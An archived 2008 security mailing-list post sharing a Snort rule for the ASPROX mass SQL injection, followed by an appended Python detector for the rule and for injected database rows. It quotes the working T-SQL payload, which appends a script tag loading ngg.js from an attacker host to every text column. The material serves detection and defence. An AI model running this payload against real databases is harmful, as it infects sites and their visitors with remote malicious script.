[Emerging-Sigs] Another ASPROX Snort rule

Greg Martin gregm at econet.com
Mon Jul 7 12:26:38 EDT 2008


ASPROX payload morphed

New domains found and new javascript payload "ngg.js" replaced the
previous "b.js" starting just a couple of days ago.  And it doesn't
seem to be wasting any time:
http://www.google.com/search?q=ngg.js    Results 1 - 10 of about
19,300 for ngg.js. (0.03 seconds)

DECLARE @T VARCHAR(255), @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name, b.name FROM sysobjects a, syscolumns b
  WHERE a.id=b.id AND a.xtype='u'
    AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE(@@FETCH_STATUS=0) BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src=http://www.apidad.com/ngg.js /script''')
  FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Snort signature to detect access of infected site:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX
Infected Site - ngg.js Request"; flow:established,to_server;
uricontent:"/ngg.js"; classtype:trojan-activity;
reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)

-G

Greg Martin
Director InfoSecurity
Econet Inc. - Sentinel IPS
972.991.5005 x102
http://infosec20.blogspot.com
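A defender-side companion to the rule and payload above, added here as an example and not part of Greg's post: one function mirrors the rule's uricontent:"/ngg.js" test on client-to-server request lines (as a quick way to triage proxy or web logs), and another finds the script tag the cursor loop appends to every text column, so a DBA can locate injected rows. Function names, the angle brackets around the script tag (the archive stripped them) and all sample data are assumptions.

```python
import re
from typing import Iterable, List, Tuple

# Indicator from the post: the injected tag loads /ngg.js from the attacker's host.
URI_CONTENT = "/ngg.js"

# Tag the ASPROX cursor loop appends to each text column. Angle brackets are
# assumed (the mailing-list archive stripped them from the quoted payload).
INJECTED_TAG = re.compile(
    r"<script\s+src=['\"]?(https?://[^\s'\">]+/ngg\.js)['\"]?\s*>\s*</script>",
    re.IGNORECASE,
)


def matches_ngg_rule(request_line: str) -> bool:
    """Mirror the Snort rule's uricontent:"/ngg.js" check on one HTTP request
    line such as 'GET /path/ngg.js HTTP/1.1'. Like the rule (which lacks
    'nocase'), the match is case-sensitive and ignores the Host header, so any
    site serving a file at that path will fire it; pair it with a host check
    before treating a hit as confirmed."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    uri = parts[1].split("?", 1)[0]  # uricontent inspects the path, not the query
    return URI_CONTENT in uri


def find_injected_values(rows: Iterable[Tuple[str, str, str]]) -> List[Tuple[str, str, str]]:
    """Given (table, column, value) triples dumped from text columns, return the
    ones carrying the appended script tag together with the URL it loads."""
    hits = []
    for table, column, value in rows:
        m = INJECTED_TAG.search(value)
        if m:
            hits.append((table, column, m.group(1)))
    return hits


# Constructed sample data (not real log or database content).
SAMPLE_REQUESTS = [
    "GET /js/ngg.js?v=2 HTTP/1.1",   # fires the rule
    "GET /index.html HTTP/1.1",      # clean
]
SAMPLE_ROWS = [
    ("Products", "Description", "Blue widget<script src=http://www.apidad.com/ngg.js></script>"),
    ("Products", "Description", "Red widget"),
]

if __name__ == "__main__":
    print([r for r in SAMPLE_REQUESTS if matches_ngg_rule(r)])
    print(find_injected_values(SAMPLE_ROWS))
```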
